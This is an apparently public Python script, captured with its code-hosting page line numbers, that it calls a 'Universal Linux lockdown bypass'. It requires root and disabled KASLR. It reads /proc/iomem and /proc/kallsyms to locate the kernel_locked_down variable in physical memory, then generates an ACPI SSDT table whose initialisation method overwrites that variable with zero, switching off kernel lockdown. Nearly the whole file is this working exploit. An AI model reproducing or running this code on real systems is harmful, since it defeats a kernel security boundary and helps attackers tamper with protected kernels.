/
genssdt.py
executable file
·58 lines (48 loc) · 1.3 KB
/
genssdt.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
#!/usr/bin/python3
# Universal Linux lockdown bypass, thanks GRUB2 <3
import os
import sys
# The Linux ACPI battery driver won't be able to resist running this :)
ssdt_code = """
DefinitionBlock ("trigger.aml", "SSDT", 2, "", "", 0x00001001)
{
OperationRegion (KMEM, SystemMemory, 0x%x, 4)
Field (KMEM, DWordAcc, NoLock, WriteAsZeros)
{
LKDN, 32
}
Device (\\_SB_.HACK)
{
Name(_HID, EisaId ("PNP0C0A"))
Name(_UID, 0x02)
Method(_INI)
{
If (LKDN)
{
LKDN = Zero
}
}
}
}
"""
# This only works as root
if os.getuid() != 0:
print("This script must be run as root!", file=sys.stderr)
exit(1)
# Make sure kernel ASLR is off
with open("/proc/cmdline") as f:
if "nokaslr" not in f.read():
print("Please add nokaslr to /etc/default/grub", file=sys.stderr)
exit(1)
# Get the kernel load address in physical address space
for line in open("/proc/iomem"):
if "Kernel code" in line:
kernel_base = int(line.split("-")[0].strip(), 16)
# Get the virtual address of kernel_locked_down
for line in open("/proc/kallsyms"):
if "kernel_locked_down" in line:
kernel_locked_down = int(line.split(" ")[0].strip(), 16)
# Calculate the physical address of kernel_locked_down
kernel_locked_down &= ~0xffffffff80000000
kernel_locked_down += (kernel_base - 0x01000000)
print(ssdt_code %kernel_locked_down)